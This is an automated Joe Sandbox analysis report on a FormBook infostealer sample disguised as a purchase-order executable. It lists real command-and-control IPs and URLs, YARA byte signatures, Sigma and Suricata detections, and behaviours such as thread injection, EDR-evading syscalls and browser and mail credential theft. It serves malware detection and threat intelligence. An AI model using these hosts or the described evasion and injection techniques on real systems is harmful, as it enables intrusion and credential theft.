Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO #86637.exe

Overview

General Information

Sample name:PO #86637.exe
Analysis ID:1515412
MD5:7fe19c52241499f1a94815ca779701d2
SHA1:86a466d7ce6653c205f78c7f1d473e35b6d520e6
SHA256:3d0f325a9cdb285dcaef0c137211ae8d3cc2d4978c25ecc39efd38677656787c
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO #86637.exe (PID: 6668 cmdline: "C:\Users\user\Desktop\PO #86637.exe" MD5: 7FE19C52241499F1A94815CA779701D2)
    • svchost.exe (PID: 6736 cmdline: "C:\Users\user\Desktop\PO #86637.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • yRUFfzlnDkMN.exe (PID: 3688 cmdline: "C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • at.exe (PID: 7004 cmdline: "C:\Windows\SysWOW64\at.exe" MD5: 2AE20048111861FA09B709D3CC551AD6)
          • yRUFfzlnDkMN.exe (PID: 5924 cmdline: "C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7136 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2be90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13f7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2be90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13f7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e4f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x165e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f2f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x173e2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PO #86637.exe", CommandLine: "C:\Users\user\Desktop\PO #86637.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO #86637.exe", ParentImage: C:\Users\user\Desktop\PO #86637.exe, ParentProcessId: 6668, ParentProcessName: PO #86637.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO #86637.exe", ProcessId: 6736, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PO #86637.exe", CommandLine: "C:\Users\user\Desktop\PO #86637.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO #86637.exe", ParentImage: C:\Users\user\Desktop\PO #86637.exe, ParentProcessId: 6668, ParentProcessName: PO #86637.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO #86637.exe", ProcessId: 6736, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-22T17:39:57.205741+020020507451Malware Command and Control Activity Detected192.168.2.44973634.150.58.7380TCP
            2024-09-22T17:40:29.297393+020020507451Malware Command and Control Activity Detected192.168.2.449741195.24.68.2580TCP
            2024-09-22T17:40:42.733820+020020507451Malware Command and Control Activity Detected192.168.2.449745162.0.213.9480TCP
            2024-09-22T17:40:57.183412+020020507451Malware Command and Control Activity Detected192.168.2.449749154.23.184.24080TCP
            2024-09-22T17:41:11.894995+020020507451Malware Command and Control Activity Detected192.168.2.44975347.104.180.13980TCP
            2024-09-22T17:41:33.166974+020020507451Malware Command and Control Activity Detected192.168.2.4497573.33.130.19080TCP
            2024-09-22T17:41:54.448144+020020507451Malware Command and Control Activity Detected192.168.2.449761199.59.243.22780TCP
            2024-09-22T17:42:07.804051+020020507451Malware Command and Control Activity Detected192.168.2.449765162.241.226.19080TCP
            2024-09-22T17:42:21.791909+020020507451Malware Command and Control Activity Detected192.168.2.44976991.215.85.2380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-22T17:39:57.205741+020028554651A Network Trojan was detected192.168.2.44973634.150.58.7380TCP
            2024-09-22T17:40:29.297393+020028554651A Network Trojan was detected192.168.2.449741195.24.68.2580TCP
            2024-09-22T17:40:42.733820+020028554651A Network Trojan was detected192.168.2.449745162.0.213.9480TCP
            2024-09-22T17:40:57.183412+020028554651A Network Trojan was detected192.168.2.449749154.23.184.24080TCP
            2024-09-22T17:41:11.894995+020028554651A Network Trojan was detected192.168.2.44975347.104.180.13980TCP
            2024-09-22T17:41:33.166974+020028554651A Network Trojan was detected192.168.2.4497573.33.130.19080TCP
            2024-09-22T17:41:54.448144+020028554651A Network Trojan was detected192.168.2.449761199.59.243.22780TCP
            2024-09-22T17:42:07.804051+020028554651A Network Trojan was detected192.168.2.449765162.241.226.19080TCP
            2024-09-22T17:42:21.791909+020028554651A Network Trojan was detected192.168.2.44976991.215.85.2380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-22T17:40:21.659147+020028554641A Network Trojan was detected192.168.2.449738195.24.68.2580TCP
            2024-09-22T17:40:24.215429+020028554641A Network Trojan was detected192.168.2.449739195.24.68.2580TCP
            2024-09-22T17:40:26.891623+020028554641A Network Trojan was detected192.168.2.449740195.24.68.2580TCP
            2024-09-22T17:40:35.188295+020028554641A Network Trojan was detected192.168.2.449742162.0.213.9480TCP
            2024-09-22T17:40:37.650196+020028554641A Network Trojan was detected192.168.2.449743162.0.213.9480TCP
            2024-09-22T17:40:40.218478+020028554641A Network Trojan was detected192.168.2.449744162.0.213.9480TCP
            2024-09-22T17:40:49.472166+020028554641A Network Trojan was detected192.168.2.449746154.23.184.24080TCP
            2024-09-22T17:40:52.031569+020028554641A Network Trojan was detected192.168.2.449747154.23.184.24080TCP
            2024-09-22T17:40:54.630810+020028554641A Network Trojan was detected192.168.2.449748154.23.184.24080TCP
            2024-09-22T17:41:04.176557+020028554641A Network Trojan was detected192.168.2.44975047.104.180.13980TCP
            2024-09-22T17:41:06.675895+020028554641A Network Trojan was detected192.168.2.44975147.104.180.13980TCP
            2024-09-22T17:41:09.615190+020028554641A Network Trojan was detected192.168.2.44975247.104.180.13980TCP
            2024-09-22T17:41:25.537878+020028554641A Network Trojan was detected192.168.2.4497543.33.130.19080TCP
            2024-09-22T17:41:28.093068+020028554641A Network Trojan was detected192.168.2.4497553.33.130.19080TCP
            2024-09-22T17:41:30.632214+020028554641A Network Trojan was detected192.168.2.4497563.33.130.19080TCP
            2024-09-22T17:41:46.924343+020028554641A Network Trojan was detected192.168.2.449758199.59.243.22780TCP
            2024-09-22T17:41:49.395064+020028554641A Network Trojan was detected192.168.2.449759199.59.243.22780TCP
            2024-09-22T17:41:52.520986+020028554641A Network Trojan was detected192.168.2.449760199.59.243.22780TCP
            2024-09-22T17:42:00.094039+020028554641A Network Trojan was detected192.168.2.449762162.241.226.19080TCP
            2024-09-22T17:42:02.976646+020028554641A Network Trojan was detected192.168.2.449763162.241.226.19080TCP
            2024-09-22T17:42:05.325691+020028554641A Network Trojan was detected192.168.2.449764162.241.226.19080TCP
            2024-09-22T17:42:14.195272+020028554641A Network Trojan was detected192.168.2.44976691.215.85.2380TCP
            2024-09-22T17:42:16.718948+020028554641A Network Trojan was detected192.168.2.44976791.215.85.2380TCP
            2024-09-22T17:42:19.288646+020028554641A Network Trojan was detected192.168.2.44976891.215.85.2380TCP
            2024-09-22T17:42:27.767760+020028554641A Network Trojan was detected192.168.2.44977084.32.84.3280TCP
            2024-09-22T17:42:30.297965+020028554641A Network Trojan was detected192.168.2.44977184.32.84.3280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: PO #86637.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.kalomor.top/1i25/?6X=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&_vft=vxWlbDi8ipa49jzpAvira URL Cloud: Label: malware
            Source: http://www.kalomor.top/1i25/Avira URL Cloud: Label: malware
            Source: http://www.kalomor.topAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: kalomor.topVirustotal: Detection: 5%Perma Link
            Source: www.kalomor.topVirustotal: Detection: 5%Perma Link
            Source: www.teksales.spaceVirustotal: Detection: 7%Perma Link
            Source: http://www.kalomor.topVirustotal: Detection: 5%Perma Link
            Multi AV Scanner detection for submitted file
            Source: PO #86637.exeVirustotal: Detection: 50%Perma Link
            Source: PO #86637.exeReversingLabs: Detection: 73%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3547928511.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1844812308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3549663217.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1845706736.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3547926363.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: PO #86637.exeJoe Sandbox ML: detected
            Source: PO #86637.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: at.pdb source: svchost.exe, 00000001.00000003.1803876072.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845110294.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000003.2248775259.000000000102B000.00000004.00000001.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000002.3547175896.0000000001017000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yRUFfzlnDkMN.exe, 00000002.00000000.1759627743.0000000000BFE000.00000002.00000001.01000000.00000004.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3547128633.0000000000BFE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO #86637.exe, 00000000.00000003.1695463679.00000000046C0000.00000004.00001000.00020000.00000000.sdmp, PO #86637.exe, 00000000.00000003.1696781527.0000000004860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1744447848.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1746074684.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845247076.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845247076.0000000003400000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1845344566.0000000003732000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3548240590.0000000003C3E000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1848717012.00000000038EF000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3548240590.0000000003AA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO #86637.exe, 00000000.00000003.1695463679.00000000046C0000.00000004.00001000.00020000.00000000.sdmp, PO #86637.exe, 00000000.00000003.1696781527.0000000004860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1744447848.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1746074684.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845247076.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845247076.0000000003400000.00000040.00001000.00020000.00000000.sdmp, at.exe, at.exe, 00000003.00000003.1845344566.0000000003732000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3548240590.0000000003C3E000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1848717012.00000000038EF000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3548240590.0000000003AA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: at.pdbGCTL source: svchost.exe, 00000001.00000003.1803876072.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845110294.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000003.2248775259.000000000102B000.00000004.00000001.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000002.3547175896.0000000001017000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: at.exe, 00000003.00000002.3546898419.0000000003452000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3549391269.00000000040CC000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000000.1918974804.0000000002C4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2246132315.00000000388EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: at.exe, 00000003.00000002.3546898419.0000000003452000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3549391269.00000000040CC000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000000.1918974804.0000000002C4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2246132315.00000000388EC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_0321C390 FindFirstFileW,FindNextFileW,FindClose,3_2_0321C390
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_0321C4C6 FindFirstFileW,FindNextFileW,FindClose,3_2_0321C4C6
            Source: C:\Windows\SysWOW64\at.exeCode function: 4x nop then xor eax, eax3_2_03209AF0
            Source: C:\Windows\SysWOW64\at.exeCode function: 4x nop then mov ebx, 00000004h3_2_037D04E8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 195.24.68.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 34.150.58.73:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 195.24.68.25:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 34.150.58.73:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49765 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49753 -> 47.104.180.139:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49753 -> 47.104.180.139:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49769 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49769 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49765 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 47.104.180.139:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 47.104.180.139:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 195.24.68.25:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 195.24.68.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 195.24.68.25:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 47.104.180.139:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49749 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49749 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 162.241.226.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 91.215.85.23:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49761 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49761 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49757 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49757 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 91.215.85.23:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.syvra.xyz
            Source: Joe Sandbox ViewIP Address: 91.215.85.23 91.215.85.23
            Source: Joe Sandbox ViewIP Address: 162.0.213.94 162.0.213.94
            Source: Joe Sandbox ViewIP Address: 162.241.226.190 162.241.226.190
            Source: Joe Sandbox ViewASN Name: PINDC-ASRU PINDC-ASRU
